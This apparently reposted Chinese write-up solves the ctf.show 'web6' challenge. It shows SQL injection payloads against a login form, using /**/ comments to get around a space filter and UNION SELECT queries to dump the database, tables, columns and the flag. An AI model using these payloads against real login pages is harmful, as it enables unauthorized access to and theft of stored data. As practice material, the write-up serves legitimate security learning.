ctf.show_web6

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ctf.show_web6相关的知识,希望对你有一定的参考价值。

打开链接发现是登录界面,猜测是sql注入,先用万能密码测试一下

1\' or 1=1#

 

 发现有些字符被过滤了,经过测试,发现空格被过滤了

因此使用/**/代替空格。

password=admin\'/**/union/**/select/**/1,2,3#&username=admin

发现2回显

 

接着开始爆库

password=admin\'/**/union/**/select/**/1,database(),3#&username=admin

 

爆表

password=admin\'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=\'web2\'#&username=admin

 

 爆字段

password=admin\'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name=\'flag\'#&username=admin

 

爆字段值

password=admin\'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&username=admin

 

 获得flag

 

以上是关于ctf.show_web6的主要内容,如果未能解决你的问题,请参考以下文章

安卓微信6.6.6最新内测版

RHEL 6.6下Python 2.6.6升级到Python 3.6.6

文件管理======

day-6 City-1

ValueError:形状(50,6)和(50,6)未对齐:6(dim 1)!= 50(dim 0)

day-6 city 8 9 10